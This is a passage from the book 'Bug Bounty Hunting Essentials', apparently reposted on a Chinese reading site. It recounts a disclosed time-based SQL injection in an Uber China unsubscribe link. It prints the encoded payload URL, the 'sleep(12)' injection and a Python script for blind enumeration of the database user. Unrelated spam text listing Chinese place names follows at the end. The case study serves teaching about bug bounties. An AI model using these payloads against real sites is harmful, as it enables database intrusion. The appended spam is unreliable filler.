官术网_书友最值得收藏!

  • Bug Bounty Hunting Essentials
  • Carlos A. Lozano Shahmeer Amir
  • 351字
  • 2021-06-10 18:35:34

Uber SQL injection

  • Title: SQL injection on sctrack.email.uber.com.cn.
  • Reported by: Orange.
  • Bounty Rewarded: $4,000.
  • Web application URL: http://sctrack.email.uber.com.cn.
  • Description: Uber is a famous ride-hailing server; it is one of the biggest in the world and is used in a number of cities around the world by people who want to move from one place to another. The reporter in this case, who is Orange Tsai, a famous bug bounty hunter, traveled to China and called an Uber. Uber sends marketing emails to riders based on their location; now. like any rider. the first thing to do is to unsubscribe from that email. That is what Orange did, but bug bounty hunters have keen eyes; Orange observed that the unsubscribe link that he received in China was different from the one he received in normal circumstances. Reviewing the original report, the URL looked something like this: http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjogIm9yYW5nZUBteW1haWwifQ==.

The p parameter contains number strings that are sent to the backend server once the link is visited. The character string in p is basically base64-encoded text with a time-based SQL command. But originally, my analysis concludes that the p parameter contains two sections: user_id, which indicated the user identifier, and receiver, which is the receiving email address. Orange identified that he could incorporate a time-based SQL string in the user_id parameter, which looks something like this:

{"user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"} 

So, the sleep(12) command as the output delays the response by 12 seconds. This is what we call the hello world of proofs of concept. From there on, Orange created a script using which he could enumerate the database name and current user. A snippet from the script is as follows:

base = string.digits + '_-@.' 
payload = {"user_id": 5755, "receiver": "blog.orange.tw"} 
 
for l in range(0, 30): 
for i in 'i'+base: 
payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#"%(l+1, i) 
new_payload = json.dumps(payload) 
new_payload = b64encode(new_payload) 
        r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p='+quote(new_payload)) 

Basically, what the script does is craft a time-based payload and send an HTTP request to the target server, which returns the current user and the database in the response, as follows:

sendcloud_w@10.9.79.210 
sendcloud 
主站蜘蛛池模板: 玉田县| 晋江市| 四川省| 蛟河市| 张家界市| 湖州市| 凯里市| 青浦区| 辉南县| 建德市| 柞水县| 林西县| 留坝县| 循化| 上饶市| 永丰县| 山东省| 汤阴县| 黄龙县| 沧州市| 仁寿县| 和顺县| 大英县| 延安市| 古浪县| 皮山县| 崇信县| 呼图壁县| 大连市| 靖安县| 迁安市| 凤阳县| 崇阳县| 南丰县| 昆山市| 铜山县| 平顶山市| 康平县| 丰城市| 汶川县| 赤城县|